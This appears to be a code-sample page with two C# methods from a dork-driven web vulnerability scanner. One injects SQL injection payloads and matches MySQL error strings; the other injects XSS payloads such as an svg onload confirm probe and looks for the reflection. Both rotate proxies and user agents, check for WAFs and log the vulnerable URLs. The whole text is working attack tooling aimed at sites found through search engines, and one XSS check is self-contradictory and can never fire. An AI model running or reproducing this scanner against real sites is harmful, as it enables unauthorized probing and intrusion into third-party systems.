Beispiel #1
0
        public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
        {
            transActions++;
            try
            {
                List <string> sqlpayloads = new List <string>()
                {
                    "'",
                    ".(('\".,,,,",
                    "AND 7786=7473-- FNiT",
                    "\"(().()('.",
                    "'YgxvMp<'\">AqklPj",
                    "') AND 7648=7021 AND ('vhCh'='vhCh",
                    " AND (SELECT 5232 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(5232=5232,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FeKK",
                    " AND 2229 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2229=2229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(113)))"
                };
                string userAgent = Leaf.xNet.Http.RandomUserAgent();
                bool   waf       = false;
                if (wafProtection(dork))
                {
                    waf = true;
                }
                Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
                {
                    IgnoreProtocolErrors = true,
                    AllowAutoRedirect    = false,
                    Cookies          = new CookieStorage(false),
                    ConnectTimeout   = helperObejct.timeOut * 1000,
                    ReadWriteTimeout = helperObejct.timeOut * 1000,
                    KeepAlive        = false,
                    UserAgent        = userAgent
                };
                string baseSource = "";
                foreach (string item in sqlpayloads)
                {
                    if (NeedProxy)
                    {
                        helperObejct.setProxy(ref req, proxy);
                    }
                    List <string> urls = helperObejct.insertPayload(dork, item);
                    foreach (string urlChecking in urls)
                    {
                        if (urlChecking == "itsnotInjectAble")
                        {
                            transActions--;
                            return(bruteResult.unvulnerAble);
                        }
                        else
                        {
                            if (baseSource.Length <= 0)
                            {
                                baseSource = req.Get(dork).ToString();
                            }
                            req.Get(urlChecking);
                            string        source     = req.Response.ToString().ToLower();
                            List <string> targetBugs = new List <string>()
                            {
                                "warning: mysql_connect()",
                                "warning: mysql_fetch_row()",
                                "error in your sql syntax",
                                "warning: mysql_result()",
                                "mysql_num_rows()",
                                "mysql_fetch_assoc()",
                                "mysql_fetch_row()",
                                "mysql_numrows()",
                                "mysql_fetch_object()",
                                "MySQL Driver",
                                "MySQL ODBC",
                                "MySQL Error",
                                "error in your SQL syntax"
                            };
                            foreach (string ite in targetBugs)
                            {
                                if (source.Contains(ite.ToLower()) && baseSource.Contains(ite) == false)
                                {
                                    transActions--;
                                    try
                                    {
                                        string url = dork;
                                        helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                        {
                                            itsABug bug = new itsABug()
                                            {
                                                id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                                url           = url,
                                                vulnerability = "sql",
                                                WAF           = waf.ToString(),
                                                payload       = item
                                            };
                                            helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                            helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                            helperObejct.mainFormObject.resultView.Items.Refresh();
                                        });
                                        dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                    }
                                    catch
                                    {
                                    }

                                    return(bruteResult.sql);
                                }
                            }
                        }
                    }
                }
                transActions--;
                return(bruteResult.unvulnerAble);
            }
            catch
            {
                transActions--;
                return(bruteResult.unvulnerAble);
            }
        }
Beispiel #2
0
        public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
        {
            transActions++;
            try
            {
                bool waf = false;
                if (wafProtection(dork))
                {
                    waf = true;
                }
                string        first              = randomText(3);
                string        sec                = randomText(3);
                string        finalpayloadTest   = "'" + first + "<'\">" + sec + "";
                string        finalpayloadCheck  = "" + first + "<'\">" + sec + "";
                string        finalpayloadCheck2 = $@"{first}<\'\"">{sec}";
                List <string> xsspayloads        = new List <string>()
                {
                    finalpayloadTest,
                    "%27%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                    "%22%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                    "PH09NIXPY74X%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                };
                List <string> containsList = new List <string>()
                {
                    finalpayloadCheck2, finalpayloadCheck
                };
                string userAgent  = Leaf.xNet.Http.RandomUserAgent();
                string sourceBase = "";
                foreach (string item in xsspayloads)
                {
                    List <string> urls = helperObejct.insertPayload(dork, item);
                    foreach (string urlNew in urls)
                    {
                        if (urlNew == "itsnotInjectAble")
                        {
                            transActions--;
                            return(bruteResult.unvulnerAble);
                        }
                        else
                        {
                            Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
                            {
                                IgnoreProtocolErrors = true,
                                AllowAutoRedirect    = true,
                                Cookies          = new CookieStorage(false),
                                ConnectTimeout   = helperObejct.timeOut * 1000,
                                ReadWriteTimeout = helperObejct.timeOut * 1000,
                                KeepAlive        = false,
                                UserAgent        = userAgent
                            };
                            if (sourceBase.Length <= 0)
                            {
                                sourceBase = req.Get(dork).ToString();
                            }
                            string source = req.Get(urlNew).ToString();
                            Regex  rx     = new Regex("PH09NIXPY74X<svg|" + finalpayloadCheck + "|" + finalpayloadCheck2);
                            if (rx.IsMatch(source) && rx.IsMatch(sourceBase) == false)
                            {
                                transActions--;
                                try
                                {
                                    string url = dork;
                                    helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                    {
                                        itsABug bug = new itsABug()
                                        {
                                            id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                            url           = url,
                                            vulnerability = "xss",
                                            WAF           = waf.ToString(),
                                            payload       = item
                                        };
                                        helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                        helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                        helperObejct.mainFormObject.resultView.Items.Refresh();
                                    });
                                    dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                }
                                catch
                                {
                                }

                                return(bruteResult.xss);
                            }
                            else
                            {
                                foreach (var STR in containsList)
                                {
                                    if (source.Contains(STR) && source.Contains(STR) == false)
                                    {
                                        transActions--;
                                        try
                                        {
                                            string url = dork;
                                            helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                            {
                                                itsABug bug = new itsABug()
                                                {
                                                    id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                                    url           = url,
                                                    vulnerability = "xss",
                                                    WAF           = waf.ToString(),
                                                    payload       = item
                                                };
                                                helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                                helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                                helperObejct.mainFormObject.resultView.Items.Refresh();
                                            });
                                            dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                        }
                                        catch
                                        {
                                        }

                                        return(bruteResult.xss);
                                    }
                                }
                            }
                        }
                    }
                }
                transActions--;
                return(bruteResult.unvulnerAble);
            }
            catch
            {
                transActions--;
                return(bruteResult.unvulnerAble);
            }
        }